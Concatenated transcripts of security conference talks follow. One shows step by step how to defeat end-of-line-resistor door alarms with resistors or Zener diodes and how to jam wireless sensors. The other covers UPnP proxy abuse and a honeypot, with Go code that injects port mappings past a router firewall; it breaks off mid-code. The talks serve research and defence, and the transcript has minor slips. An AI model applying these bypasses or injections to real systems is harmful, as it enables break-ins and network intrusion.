those are firmly on then we can clamp this down and then I'll take this yellow lead it's for measuring current. 
Make sure it's good and securely on there. I'll flip this into current measuring mode and flip the switch to send the multimeter leads to red and yellow. We get zero which makes sense. All the current is still flowing through this line so we now have to cut that line at which point we'll be able to measure the current. So we've done that and we now measure 50 milliamps. With those two measurements we can now calculate what resistance we need to attack this line. In this case 5 volts divided by 50 milliamps is 100 ohms and that's ohms because it's milliamps so we get our measure in kilovolts and have to convert. So here is a 100 ohm resistor and I'm going to use this as my attack resistor. I'll clip it on to our green and white leads these are our attack leads again making sure that it is fully securely connected. Actually I'll clip on right at the base and you'll see why in a moment. And just to double check flip it back out of current measuring mode. Turn it into resistance mode and flip this switch to send the green and the white to the leads and we can measure that this is indeed 100 ohms. With all that done we're now ready. When I flip this switch to actuate the attack it's going to reroute power instead of going from red through to yellow through the door back to black and back to the controller. It's going to cut the line between red and yellow and send red to green through the resistor and white to black and back to the controller. So I'll flip that switch now. We've now engaged the attack. At this point the door is no longer connected all of the power is going through our attack resistor and I can safely open the door and the controller is none the wiser. The last thing that we can do is to make this a permanent setup. We can wire these in directly using these 3M Scotchlock joins. So I will insert. We need to match white to black. Insert the wire all the way. Insert the wire all the way as far as it will go. And then I will clamp that down to connect those two. I can now safely remove the white and the black leads and I'll do the same to connect red to green. Take another join. Insert that as far as it will go. Whoops! So you'll notice that the controller just detected a short circuit and that's because I accidentally let these two wires touch on the wrong side of the resistor. So that would have been a fail. Had this been a real life circumvention of an alarm. Make sure those don't touch again. And then I can safely remove all of the leads and leave now instituted an attack. The ground wire is still connected but it doesn't need to be and just to illustrate the point I will cut that as well. And so now we've successfully measured what the end of line resistance is and installed a new surrogate resistor that power is flowing through and now of course it's disconnected. Opening the door does not set off the alarm. So we can see in our schematic what was happening there. When we flip this switch to measure voltage it sends the red and the black wire to the leads of our multimeter and it can then measure the voltage. Likewise for the current with the red and the yellow wire and for the resistance sending the multimeter ports to green and white which is what contains our attack resistor. So we can ask ourselves can we do better than that. There were a number of problems with the resistive based approach. One is measuring current is incredibly tedious and requires cutting the line. 
If we can avoid having to cut the line then we can potentially remove the attack and restore it to its original state if that's necessary. And the second bigger problem is that when we flip the switch to engage the attack two pole switches when you flip them have a brief period of time where neither pole is connected and at that point the controller would see an open circuit. It's very brief and the vast majority of controllers would not be able to detect that but some will and so that's something that we want to avoid. So what would be ideal is if we can tap each line once and have something across it that maintains exactly the voltage that we need and just enforces that and then we don't need to worry about the current. Well such a component actually does exist and it's called a Zener diode. So diodes as you know allow current to flow one way and block at the other. When it blocks the current it acts as an insulator and all insulators will break down when exposed to a high enough voltage. Zener diodes are designed to do this at a lower and at a very specific voltage level. So when we reverse bias the Zener diode i.e. apply a voltage in the reverse direction so it's an insulator above a certain breakdown voltage it turns into a very good conductor. So what that then lets us do is when we open the door and it jumps say from 5 to 12 volts if this is a 5 volt breakdown Zener diode it's now 12 volts it becomes a conductor and it pulls that voltage down to 5 at which point it becomes an insulator again and it doesn't pull it down any further. We get a feedback system where this maintains exactly 5 volts. Let's apply this so we have the same type of system we can strip the wire and right now it's 5 volts we open the door it opens circuits it and it's all the way up at 12 volts and so we'll try to find a Zener diode that will adequately maintain that. First we'll tap each line once. Now we can see the controller in this game but in real life we would just have access to the line so we'll have to add a voltmeter so we can actually tell what is the voltage and so we'll wire that into our tap devices and that tells us indeed it's 5 volts so we need a Zener diode with a breakdown as close to 5 volts as possible. Well 5.1 is pretty close and that should be within the parameters of what the controller deems acceptable and we can wire that in as well. I have to wire it somewhat in reverse because we need this to be in reverse bias so that's why it crisscrosses over itself there but now that we've done that when I open the door it now only increases up to 5.1 volts which is the breakdown voltage of our Zener diode anything above that and the diode begins conducting and pulls the voltage back down to 5.1 volts and that's well within the acceptable range for our controller so it does not trigger an alarm. We can make one addition to our multimeter adapter to help ease this process and that is adding an internal power source that we can flip a switch that will then apply that across the measuring leads of the multimeter and the green and white component leads so that we can actually test a Zener diode and make sure that it pulls down from the supplied voltage to what the Zener should be pulling it down to. Now let's take a look at this in real life and applying the Zener diode attack. So let's see how we'd apply the Zener diode based approach. We have the exact same setup here and we're going to start in the exact same way by tapping each wire but only once this time we only need to do two taps. 
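In other words, idealizing the diode, the line the controller watches gets clamped at roughly

\[ V_{\mathrm{line}} \approx \min(V_{\mathrm{open}},\, V_Z), \]

so a 5.1 V Zener across a loop that normally sits at 5 V holds the reading near 5.1 V even when the opened door would otherwise let it float up to the full 12 V supply. (This ignores the diode's real I-V curve, which is why the clamped value in practice isn't a perfect match.)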
Of course if the door opens we get the same behavior, and so we'll try to avoid that happening this time, so we can perform the defeat without setting off the alarm. So get that wire onto our tap device, put in the other wire as far as it will go, then we're ready to clamp this down. That's now good and connected. We'll tap the other wire in much the same way. Make sure that's fully on, insert this as far as it will go. Make sure both are in place and we can then clamp this down as well. Of course you want to be careful that these two don't touch. If they do we will short out the system. The current jumps up and the voltage jumps down to zero, and the controller will detect that, as we're seeing it does here. So in a real life scenario we want to make sure we don't do that, but now we can measure what the voltage is as measured by the controller. So we'll take our handy measuring device, clip it on, switch into voltage mode and flip this switch to send the red and the black to the two ports of the multimeter, and we read 5 volts. So we need a 5 volt breakdown Zener diode, which I've got right here, and we'll clip it on to our component leads. And we could perhaps also test that this is actually 5 volts. So to do that we'll leave it in voltage measuring mode, flip this switch to send these two leads to the ports of the multimeter. We get zero, which makes sense. I'll flip this last switch to apply an internal 12 volt supply. So we're reading 12 volts when it's open circuited. If I connect it through the Zener diode it then pulls it down to 5 volts, which is what we want. Turn off that measurement. We're now ready to apply the attack, and all we need to do is flip the switch to engage the attack. It then turns on that Zener diode, and now if I open the door it will regulate the voltage accordingly. It isn't perfect, it's not a perfect match to 5 volts, but we see that this would be within the acceptable parameters for the controller here. And of course if I flip the switch back to disconnect it, it now operates as normal. I should note that this fancy setup is not actually required: because we never cut the line, we do not need to switch quickly from connecting the yellow port (which isn't used) to our attack component. So all I really needed was any old voltmeter that could have measured across here, and at that point I can then connect these up any old way I please, and with those connected I'm free to open the door as well. And of course if they disconnect it behaves as usual. And so in this case, as well as the last, I could take some joins and connect this in to leave it as a permanent fixture defeating the alarm. After everything we've talked about it may be tempting to say, well, wireless must be more secure and we should use that instead. Here's why that's not the case. This particular example we have here communicates on 433 megahertz, so if we open the door it will send a signal and the alarm is triggered. We can listen to what that signal is with our trusty Baofeng, so we'll listen to 433 megahertz. And when we open the door we hear that signal. Of course we can use the transmit feature to jam the signal. And so we've now successfully opened the door and the controller has no idea. Now any frequency it might use, not just 433 megahertz, is jammable, possibly not so easily. Wi-Fi is another option that has a known vulnerability, and that is deauthers. Here's one that I particularly like, made by Maltronics, but any will do.
You can open it up and it'll take advantage of the Wi-Fi protocol to listen for specific devices and kick them off of the network whenever they join. You can use the hardware MAC address to specifically kick off those devices made by alarm manufacturers. So if using wireless is not a great solution, what can we do to defend against these attacks? The first thing is, anywhere we run these wires should be in armored conduit, and places where it's easy to unscrew a junction box and access the wires underneath should be placed high, out of reach, or under a camera to deter an attacker's ability to do that. We might also consider placing tamper switches in those junction boxes where that is not possible. We obviously want to avoid doing this: having bare wires out right at hand level, easy for anyone to access. We also want to install all the critical security hardware, and the wires for it, on the secure side of the door. So we should never have a contact sensor mounted on the unsecure side of the frame like this, and the wires themselves should be on the secure side as well. In particular we want to give some thought to where the wires get routed throughout the building in reference to the security levels of different areas in the building. For instance, rooms 103 to 105 are more secure in this case. The wires for them go to this controller in room 103. We would want to run them in the rooms themselves and not in the hallway that has a lower security level. We also want to give some thought to timing as well as spatial aspects: if part of the building is open to the public during some hours but not others, it might be possible for an attacker to modify these systems during open hours and then come back afterwards, and that's something that needs to be considered as well. We want to avoid at all costs running security wires outside of the building or outside of all security perimeters, and that's not just if this is in your threat model (and let's be honest, for the vast majority of installations these types of attacks are not in your threat model), but also if the outside of your building is ever exposed to weather. It's a rare phenomenon, I know, but it can wreak absolute havoc on communication lines when it infiltrates into there. And of course the ultimate defense here is to use a well-designed encrypted digital line, so that would be one that uses nonces to prevent replay attacks and has heartbeats to detect denial of service, etc. But that's very expensive and often not justified in terms of that cost. So thank you very much for listening. I hope this has been interesting and a foray into an area of physical security that has not yet been given a huge treatment in this community. I'd like to extend an enormous thank you to Paul, Karen, Jenny and Bobby for their help in preparing this talk, in particular to Paul for his expertise in the telecom industry. I encourage you to go try it yourselves. All of these games that I've shown in this talk are available for you to try in the comfort of your own home. Give that a try in the Bypass Village at DEF CON or at bypassvillage.org, and I'd be happy to take any questions either in person at DEF CON or over email or Twitter. Thank you very much.
|
Alarm systems are ubiquitous - no longer the realm of banks and vaults only, many people now have them in their homes or workplaces. But how do they work? And the logical follow-up question - how can they be hacked? This talk focuses on the communication lines in physical intrusion detection systems: how they are secured, and what vulnerabilities exist. We’ll discuss the logic implemented in the controllers and protections on the communication lines including end of line resistors - and all the ways that this aspect of the system can be exploited. In particular, we’ll release schematics for a tool we’ve developed that will enable measuring end-of-line resistor systems covertly, determining the necessary re-wiring to defeat the sensors, and deploying it without setting off the alarm. After the talk, you can head over to the Lock Bypass Village to try these techniques out for yourself!
|
10.5446/54196 (DOI)
|
Welcome to my talk. This is UPnProxyPot: fake the funk, become a black hat proxy, man-in-the-middle their TLS and scrape the wire. To begin, I'm Chad Seaman, but around here at DEF CON you can just call me Dirt. I am part of the Akamai SIRT team. I'm actually a team lead and senior engineer on that team. For those of you unfamiliar with the SIRT team, which is probably all of you, you may have heard of some of our research before. We focus on DDoS and emerging threats research, but that typically leads us down the path of malware and botnets and proxies and other good stuff. So before we begin, you're going to see me talk about IoT. A lot of you are going to think IoT means Internet of Things. That's not true for me. It's the Internet of Trash. Whenever you see me say IoT, that's what I mean. So what's this talk about? Well, SSDP and UPnP have been widely vulnerable on IoT devices for nearly 20 years. It's not only possible, but also very easy to turn these devices into proxy servers. When attackers find vulnerable IoT devices susceptible to this kind of attack, they turn these devices into short-lived proxy servers and delete their tracks when they're done. If they don't delete their tracks, the tracks will delete themselves. We're going to cover SSDP and UPnP, previous UPnProxy research and campaigns conducted by me, and finally UPnProxyPot: how it works and findings from a year of geographically distributed deployments. So first things first, SSDP and UPnP. SSDP stands for Simple Service Discovery Protocol. It's a technology that's built for the LAN, and uses broadcast addressing with HTTP over UDP. It essentially allows machines on a LAN to announce themselves and/or hear announcements from their neighbors or network peers, and then expose them to UPnP, which will in turn expose services such as printing and media sharing and network configuration, all that kind of stuff. UPnP is Universal Plug and Play. It's also built for the LAN. It's good old HTTP and SOAP, SOAP as in XML. It lets machines on a LAN inquire about the services and configuration options offered by a device. It also allows them to access those services and/or potentially modify those configurations. So a good example of this is an Xbox, right? An Xbox or a PC game may need you to forward certain ports or certain traffic around the firewall, rather than deal with the state of managing that in the NAT. So that's what UPnP basically enables. It allows your Xbox to go forward and say, hey, poke a hole in the firewall, send everything on UDP, you know, 1234, over to me. So what is wrong with these technologies? Well, for SSDP, IoT devices are notoriously bad at deploying this correctly. The same is true for UPnP. It's built for the LAN, but they stick it on the WAN just because, I don't know, just because. It was a reflected DDoS vector, the up-and-coming most popular, MVP, King of the Hill, whatever you want to call it, in 2014 and 2015. It's still fairly popular for that, but it's not as popular, mostly due to other vectors becoming more popular, not because it's gotten that much less abused. We're still finding this bullshit everywhere. Older products are still on the internet. Amazingly, "newer" products, and new is there in quotes, but some newer products, and by newer I mean within the past few years, still have these problems. So 20 years later, at a minimum 14 years, and here we are still having the same old problems.
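For readers who have not poked at SSDP before, discovery really is just HTTP-formatted text over UDP multicast. A minimal probe in Go might look like this; it is a sketch, not the scanner used in this research, and the search target and timeout are arbitrary example choices.

package main

import (
    "fmt"
    "net"
    "time"
)

func main() {
    // SSDP discovery is HTTP-style text over UDP, sent to the well-known
    // multicast group 239.255.255.250:1900.
    probe := "M-SEARCH * HTTP/1.1\r\n" +
        "HOST: 239.255.255.250:1900\r\n" +
        "MAN: \"ssdp:discover\"\r\n" +
        "MX: 2\r\n" +
        "ST: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n\r\n"

    pc, err := net.ListenPacket("udp4", ":0")
    if err != nil {
        panic(err)
    }
    defer pc.Close()

    dst, err := net.ResolveUDPAddr("udp4", "239.255.255.250:1900")
    if err != nil {
        panic(err)
    }
    if _, err := pc.WriteTo([]byte(probe), dst); err != nil {
        panic(err)
    }

    // Responders answer unicast; their LOCATION header points at the UPnP
    // description XML, which is the pivot attackers (and the honeypot) rely on.
    pc.SetReadDeadline(time.Now().Add(3 * time.Second))
    buf := make([]byte, 2048)
    for {
        n, addr, err := pc.ReadFrom(buf)
        if err != nil {
            return // deadline hit, done collecting replies
        }
        fmt.Printf("reply from %s:\n%s\n", addr, buf[:n])
    }
}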
So UPnP, Universal Plug and Play, once again, built for the LAN, but they seem to just love to stick this stuff on the WAN too. It treats the LAN as a safe space, which is fine, but the WAN is not a safe space. So when you're listening on the WAN and thinking it's a LAN, it's a little bit of a problem. It just does whatever its trusted network peers tell it to do, and does not require auth. There's not really a whole lot protecting it. Information disclosure: it will tell you everything, model numbers, makes, serial numbers. On top of that, it will tell you how to talk to it, what services it exposes, what configurations, what data you can push in and what data you can expect to get out. It facilitates configuration changes on some devices. It makes it very easy to do those changes. In some cases, there are known RCE injections in the UPnP daemons, in the SOAP handling. So basically your SOAP can get remote command execution on the underlying device. So let's take a quick look at the history here and why I talked about 20 years. The first instance that I could find of somebody exposing something here is 2003, Bjorn Stickler. He came public with a NetGear UPnP information disclosure. A couple years later, and I'm going to slaughter this guy's name, Armijn Hemel, I think, in 2006 gave a talk at the SANE conference, and he launched a website called upnp-hacks.org. There's a ton of great info here. His talk really kind of blew the lid off of all the problems that UPnP actually had and all of the potential vectors it could expose people to. And then in 2011, Daniel Garcia gave a talk at DEF CON 19 called UPnP Mapping. It was a great talk. It kind of touched on this proxying capability and some of the problems with UPnP. I was in the crowd. It freaked me out enough that I think my TP-Link router at the time was actually impacted by this, and I went ahead and remoted into my home network and disabled UPnP from the talk, while I was in the talk, from my phone. So, a brief history of UPnProxy. In 2014, SSDP is the new up-and-coming DDoS vector, starting to see abuse pretty widely. At that time we were known as PLXsert. We were asked to write about it, start digging into it and put out an advisory and all that good stuff. So in 2015, well, this was happening at the end of 2014, in early 2015 the SSDP research leads me to discover UPnP, and it kind of brings that 2011 talk back up in my head. I'm like, oh man, I remember this being like a shit show. So in 2016, I decided that since it's been about a decade after the SANE conference talk and upnp-hacks, it might be fun to revisit this and see how bad this landscape is. Are we talking hundreds of thousands? Are we talking millions? And just talk about it, and kind of try to bring up the fact that this is 10 years later, these things are still a problem, these threats still exist in the real world, and everybody just kind of seemed to have forgotten about it. So I start writing that paper. The reason it's relevant is because I had to write a tool chain to test some of these theories and concepts. This is a tool chain here that was for testing the NAT injection capabilities on exposed UPnP devices. So in the top there, you see the SSDP banner that we get back. We take the 192.168.0.1. We change that to the public-facing IP address that we found UPnP responding on. In our SOAP payload, we set that port 5555 is going to point into 192.168.0.1, which we know is the router at this point, on port 80.
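For readers following along, here is a rough sketch of what such an AddPortMapping SOAP request looks like on the wire, written in Go rather than as the curl one-liner used in the research. The control URL, ports, and internal host below are placeholders, not the values from the actual tool chain.

package main

import (
    "fmt"
    "net/http"
    "strings"
)

func main() {
    // Standard UPnP IGD AddPortMapping action; all values are placeholders.
    soap := `<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
            s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body>
    <u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
      <NewRemoteHost></NewRemoteHost>
      <NewExternalPort>5555</NewExternalPort>
      <NewProtocol>TCP</NewProtocol>
      <NewInternalPort>80</NewInternalPort>
      <NewInternalClient>192.168.0.1</NewInternalClient>
      <NewEnabled>1</NewEnabled>
      <NewPortMappingDescription>test</NewPortMappingDescription>
      <NewLeaseDuration>600</NewLeaseDuration>
    </u:AddPortMapping>
  </s:Body>
</s:Envelope>`

    // The control URL differs per device; it is advertised in the description
    // XML that the SSDP LOCATION header points to. This one is made up.
    req, err := http.NewRequest("POST",
        "http://192.168.0.1:2048/upnp/control/WANIPConn1", strings.NewReader(soap))
    if err != nil {
        panic(err)
    }
    req.Header.Set("Content-Type", `text/xml; charset="utf-8"`)
    req.Header.Set("SOAPAction",
        `"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"`)

    resp, err := http.DefaultClient.Do(req)
    if err != nil {
        panic(err)
    }
    defer resp.Body.Close()
    fmt.Println("status:", resp.Status)
}

The same POST pattern, swapped to the GetGenericPortMappingEntry action with an incrementing NewPortMappingIndex argument, is what lets you walk a device's NAT table, which is how the injected entries described below turn up.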
We then issue that SOAP request via curl. And what we see here is before the injection and after the injection in the scan results there. TCP 80 is filtered, you couldn't get to it. But once I opened TCP 55555 and then I hit it in a browser, I am greeted with the admin login page. So that's a little bit of a problem, being able to get around the firewall that easy. As I'm doing this research in September of 2016, we get hit with a 620 gigabit per second sustained DDoS attack from a botnet. At that point, the botnet was unknown. It ultimately got named Mirai. So as I'm digging into that, I'm inspecting attack sources. I'm seeing lots of IoT. There's a decent overlap with the existing identified UPnP dataset that I had from my decade-after-disclosure research. I decided that the UPnP info leaks could maybe help. And I start scraping those and poking these devices in general, trying to figure out what the heck they are. So it turns out correlation is not causation. The fact that these devices were present in the Mirai botnet has nothing to do with Mirai. It's just that shitty devices are shitty. And if it's compromisable one way, it's probably compromisable two or three other ways, in the Internet of Trash space that is. So having already written the script to dump the NAT tables as part of the NAT injection testing, I started doing that just to see, you know, maybe there's something weird going on in there that we could figure out. Like I said, it was not related at all. But what I did notice when I did that was there were some really weird entries in some of these devices out in the wild. Entries pointing to DNS servers. They pointed to Akamai CDN servers. They had been pointing at HTTP and HTTPS web servers, which is really interesting. But I have other shit to do. Got a really big botnet. I got to figure out what the hell is going on. So I kind of just stick that on the mental back burner and move on. So on the timeline here, we're down here at the Mirai botnet and huge DDoS. So while I'm investigating that, I accidentally uncover the UPnProxy stuff, but I'm too busy dealing with this botnet. In 2017 things start to calm down. Mirai, at least, I have tooling to be able to better track and handle. So I start looking back at some of my other research and I decide I'm going to look at what some of those really weird NAT entries were on some of those devices. And I began scanning the entire Internet and dumping all of the NAT tables of all of these exposed UPnP daemons. This is when we uncover the UPnProxy campaigns. So, UPnProxy uncovered, by the numbers. There were 4.8 million SSDP responders in that data set. 765,000 had exposed UPnP. It's roughly 16%. So of those, 65,000 were actively injected with UPnP entries. That's 9% of the total vulnerable population and 1.3% of the total responders. Of those, 17,599 unique endpoints were identified as being injected in these devices. Typically, if a device had one injection, it had multiples. The most injected destination had 18.8 million instances across 23,236 devices. The second most injected destination had 11 million instances across 59,943 devices. I point this out because it shows two kinds of campaigns running simultaneously here. The most injected destination obviously had a lot more instances of injections across a much smaller pool of devices. And then the second most injected destination had a lot fewer injections but a much larger swath of devices that they were injected on.
All in all, there were 15.9 million injections to DNS servers, 9.5 million injections to web servers, and 155,000 injections to HTTPS servers. While I'm doing this research, I'm talking to some fellow researchers and friends and one of the guys goes, hey, I think my friend's working on something very similar. Would you be interested in talking to them? Absolutely I was. I'm very sorry to the researcher I talked to. I don't remember your name and I can't find the email. And Symantec did not give you a shout out on their blog. So thank you for your hard work and I'm sorry. What they ultimately found was that there was an APT group and they were running this inception framework where the attackers were basically using these UP and proxy instances and they were chaining them together. So they would log into their VPS, they would inject a proxy route that pointed to another UP and proxy vulnerable device. They would then use that injection to inject another route, then use that injection to inject another route that ultimately pointed out to their target destination, which was a cloud storage provider for uploading their malware. And then they would use that to upload their malware to the cloud platform. And this is partly to get around detection, right? A lot of times you'll have these lists of known proxies, known endpoints, etc. And when you've got a pool of tens of thousands of home devices that aren't on any of those lists, you're much less likely to set off some alarm bells when you log in and upload a nasty file. So really interesting research. I gave him my tools, he was able to confirm it was what we thought it was. And then I was able to confirm in my data that I could see some of the similar clustering. So what you're seeing here in the graph on the right is two different bubble graphs. The size of the circle is respective to the number of outbound routes found on that device. And then every blue line is pointing in the direction of a relationship. There's an arrow, so where you see the thick blue on one side, that is the tips of the arrows running into one another. And there's clearly two different strategies. The top cluster, you have a larger pool with a handful of routes that go out, and they all point into a smaller pool of devices that may only route to one or two or three things. And in the bottom cluster, you see a centralized, high route out collection, and then they all point out to different endpoints. So it's just a different structure, a different strategy of building that chaining, but the chaining exists and I thought that was pretty cool. So we find all this stuff, but it's not super widespread. I'm just kidding, it's everywhere. So there's 73 brands and over 400 models that we could identify. And it's important there that I say we could identify, because we were only able to successfully fingerprint with confidence about 24% of these based on information leaks. And those information leaks weren't just what came from the UPMP Damage. Sure, it helped a ton because it's a super chatty, it exposes quite a bit of information about the device, like I said. But we would also go so far as to attempt to see what other reports were there, SSH banners, anything like that that we could potentially fingerprint on, we tried. And still, we can only get about 24%. So that is quite a considerable amount. 73 brands and 400 models is a nice chunk, but you got to remember that there's 76% that we couldn't even identify. So who knows what they are. This publication goes live. 
And you know, the crowd goes mild. Nobody really cared. It didn't really get a lot of attention. I was pretty disappointed. I thought it was a very cool finding. But I'm downplaying that a little bit. So a couple people cared. The people that needed to care cared. So I'll take that as a win. The research did get some industry attention through some trust groups and work groups and stuff, did get elevated and passed along. And it was ultimately used to help some ISPs support the case internally for cleanup and, you know, sanitation efforts. So progress is made behind the scenes. Some networks start filtering SSDP. That's all good. You'll see the result of that in the next couple slides. Ultimately, I get an email from a journalist. She's doing some work. And she was recording this new show. Her name is Justine Underhill. And she wanted to talk to me about UPnProxy because the episode she was recording was on IoT and security and everything else. So while we're recording this video, I decided that, you know, she's asking questions about how hard is this? How long does it take? How much does it cost? And I'm like, well, I'll just show you. So I pull out the laptop, jump on the internet, run Zmap and hit the first 1000 things that respond to my SSDP probe. And then I start dumping their NAT tables. And while I'm sitting there showing her this, I'm like, man, I think we just found something new. Like this, this wasn't in the previous scans. And this is how I accidentally discovered the EternalSilence stuff, which was cool, because we didn't really have a solid case. I had proposed that attackers could use this to route around the firewall, but we didn't really have solid proof from our existing scans that that was occurring yet. So these are what the injections look like after they go through our logging process and are converted into JSON. You can see that they are targeting IPs inside the LAN, the 192.168.1.0 space, probably from the information leak from the SSDP banner. And then, so like there on 166, you can see that they tried to open a port forward to 139 and port 445. So they're injecting routes into the LAN space. And they are targeting Samba or SMB. We named it EternalSilence because Samba and SMB were clearly being targeted by EternalBlue pretty heavily at that point. And the Spanish there, there's in the new port mapping description, there's some Spanish, and I am terrible at Spanish. So my gringo Spanish for it is "galleta silenciosa", which, go ahead and laugh at me. But it roughly translates to silent cookie. So UPnProxy EternalSilence is discovered and published. Ultimately, 3.5 million SSDP responders. So some of that cleanup effort worked. We found almost a million fewer devices than we did in our previous research. 227,000 instances of exposed UPnP, and 45,000 had active EternalSilence injections. There's no way to really know what they were up to. But based on what they were targeting, the EternalBlue link is an educated guess. And that educated guess is based on if I were evil. That's what I would do, right? I've got this surefire SMB exploit. But everything that's running it on the internet has already been popped. But you know what? If I can find a way around some of these firewalls, I can probably find some devices that are still listening on that, that haven't been patched. And now I've got a new place to drop my ransomware. So that's cool. All this research is cool. But we still have problems.
The research up to this point, it has been via passive identification. This requires scanning the entire internet regularly to find stuff. It's time consuming. We get lots of hate mail and threats for scanning stuff. People don't like when you scan the internet. Guys, relax. Relax. You're allowed to scan the internet. It's not a crime. Okay. It's still time consuming. It results in a ton of logs because we're dumping all of these NAT tables. So it ends up with gigs and gigs and gigs of logs per scan. On top of that, it's very time sensitive, right? We know that the attackers can delete their entries. We know that the entries time out. So the fact that we're finding anything at all is pretty surprising, especially when you consider that reality. So the real problem here is that we can tell where they're doing stuff and where they're pointing stuff, but we don't actually have visibility into what they're doing with it. So if we see them injecting, you know, port 25, we assume it's spam, but we have no idea. They could be dropping 0-days against, you know, SMTP servers, no clue. So we need to fix that. And that's where UPnProxyPot kind of enters the fight, if you will. So what is UPnProxyPot, the 50,000 foot view? It listens for SSDP probes and it directs attackers into a fake UPnP instance. The UPnP emulation is good enough to get to the injection phase. It's not a full implementation. It could be improved, but it's good enough. From there, we offer on-the-fly proxy capabilities with man-in-the-middle content inspection and logging. TLS stripping is also supported. All of this is easy to modify, in the sense that if you want to pretend to be a different device, all you have to do is change some XML files and some text files on disk. It doesn't require code changes to change your device profile per se. It offers session-based pcap capabilities, so you can come back later and inspect the traffic that went over the sockets, and it's written in Golang and bash. So, SSDP emulation. The SSDP response that is currently in the project was lifted directly from the most abused device that we discovered during the UPnProxy research. It's stored in a flat file on disk. You can change it without modifying any code. The one gotcha is if you update the SSDP banner and it changes the port on which the UPnP daemon is listening, because this is what the attackers pivot on, you will need to change the listening port in code that the UPnP daemon listens on. I didn't have a configuration file set up when I wrote this in my initial thing. It's an improvement that could be made. UPnP emulation. So the UPnP responses are also lifted from those same most-abused devices. All the HTML and XML is stored in flat files; updating them requires no code changes. The UPnP emulation serves basic files and handles NAT interactions. The attacker-supplied SOAP is parsed and handled via regex. It will respond with proper error payloads if criteria are not met or the XML is malformed. Responses must contain attacker-supplied data, so these responses use standard printf formatting. So if you need to change your thing and the attacker-supplied port needs to be in this chunk of XML, you can just put the %d in and it will be there. So, on-the-fly proxy. This is kind of unique because the attacker gets to control their proxy configuration themselves. So we had to support that. Attackers submit their proxy config via SOAP, just like they are talking to real UPnP.
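As a sketch of that regex-plus-printf approach, here is an illustrative handler in Go. This is not the project's actual source; the field names follow the UPnP IGD spec, but the template and log format are invented for the example.

package main

import (
    "fmt"
    "regexp"
)

// Pull the attacker-supplied mapping fields out of the SOAP body with plain
// regexes rather than a full XML parser, in the same spirit as the honeypot.
var (
    extPort = regexp.MustCompile(`<NewExternalPort>(\d+)</NewExternalPort>`)
    intHost = regexp.MustCompile(`<NewInternalClient>([^<]+)</NewInternalClient>`)
    intPort = regexp.MustCompile(`<NewInternalPort>(\d+)</NewInternalPort>`)
)

// Canned success envelope; responses that must echo attacker-supplied values
// back are built the same way, with fmt.Sprintf over a flat-file template.
const okEnvelope = `<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>
<u:AddPortMappingResponse xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"/>
</s:Body></s:Envelope>`

func handleAddPortMapping(body string) (logLine, response string, ok bool) {
    e := extPort.FindStringSubmatch(body)
    h := intHost.FindStringSubmatch(body)
    p := intPort.FindStringSubmatch(body)
    if e == nil || h == nil || p == nil {
        // A real handler would answer with a proper UPnP error payload here.
        return "", "", false
    }
    logLine = fmt.Sprintf("injection: external %s -> %s:%s", e[1], h[1], p[1])
    return logLine, okEnvelope, true
}

func main() {
    soap := `<NewExternalPort>22280</NewExternalPort>` +
        `<NewInternalClient>203.0.113.10</NewInternalClient>` +
        `<NewInternalPort>80</NewInternalPort>`
    logLine, resp, ok := handleAddPortMapping(soap)
    fmt.Println(ok, logLine)
    fmt.Println(resp)
}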
We parse them and then create a session of sorts and then we scrape and log plain text across the proxy session in both directions. If they are proxying to TCP 443, it's a special use case and we assume that connection is a TLS connection and we do some special man in the middle of there. So stripping TLS and this is a hard slide to read. It's very upsetting. So attackers actually do some verification when they are using the TLS connections. The initial deployment saw connections but they would bail before actually pushing data across that connection. So we have to do some verification. Attackers are fingerprinting certs. Initially they were doing this via the subject line. There is an automated cloning process where we began by pulling the domain out of the client hello. We then go forward to the injected endpoint and we get the cert with the respective SNI that was provided in the client hello. We copy the remote cert and we mirror it into a self-signed clone cert and this all happens in real time when they first establish their connection. This allows us to, it was allowing us to bypass their fingerprinting and actually get plain text out of the TLS flows. Literally yesterday as I'm recording this, literally yesterday it stopped working and I don't know why. I don't know if they've changed their fingerprinting. I don't know what is really going on but I have a year and a half, well I have months worth of logs at this point that have this functional and now that it's about to go open source it breaks. So I'm sorry. I hope we can figure it out. So the other feature is the automated p-capping. The project uses GoPacket. It allows us to create p-caps on the fly using Berkeley packet filters that are scoped to the individual sessions, the individual proxy sessions. As attackers interact with the proxy injection the p-caps are automatically collected. If you find something interesting in the logs you can find the associated p-cap and see the entire session easily in whatever your favorite, you know, p-cap packet muncher is, wire shard, TCP dump, whatever. If you run out of disk space on your deployed honeypot this is probably why. That is from a single machine down there at the bottom. You can see that we had 81,100 p-caps that we ultimately collected for different sessions and of those p-caps it resulted in almost five and a half gigs of disk consumed. So this part hurts as well. The initial deployment was for one year and it was four nodes deployed across a single VPS provider. There were geos from Dallas to London to Tokyo. 300 gigs of p-caps and logs were ultimately collected. Hundreds of millions of captured proxy sessions and billions of log lines. And you know I downloaded all that and I destroyed the cluster and then I accidentally lost the backup. So I figured this out literally like a day after I submitted the CFP to DEF CON. Luckily I had a couple months before everything was accepted and approved. So I was able to deploy a smaller four node cluster for the two months between CFP and what you're seeing now. So ultimately four nodes deployed US, UK, India, Japan. 39 gigs of p-caps and logs collected 230,000 captured proxy sessions and 22 million lines of logs. The good news is I did have some notes so not everything was lost from the previous deployment and the trends that I saw in the new data are spot on for the trends I saw in the old data. There's not a whole lot's changed just a lot less data to back up the claims but I promise you it's pretty much identical. So observations. 
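Before the observations, a quick sketch of that per-session capture mechanism using gopacket. This is illustrative only; the interface name and BPF filter are example values, whereas the project scopes its filters to each injected proxy session.

package main

import (
    "fmt"
    "log"
    "os"
    "time"

    "github.com/google/gopacket"
    "github.com/google/gopacket/layers"
    "github.com/google/gopacket/pcap"
    "github.com/google/gopacket/pcapgo"
)

func main() {
    // Open the capture interface; name and snap length are example values.
    handle, err := pcap.OpenLive("eth0", 65535, true, pcap.BlockForever)
    if err != nil {
        log.Fatal(err)
    }
    defer handle.Close()

    // Scope the capture to one session with a BPF filter (example filter).
    if err := handle.SetBPFFilter("tcp port 22280"); err != nil {
        log.Fatal(err)
    }

    // One pcap file per session, so a log hit can be matched to full packets.
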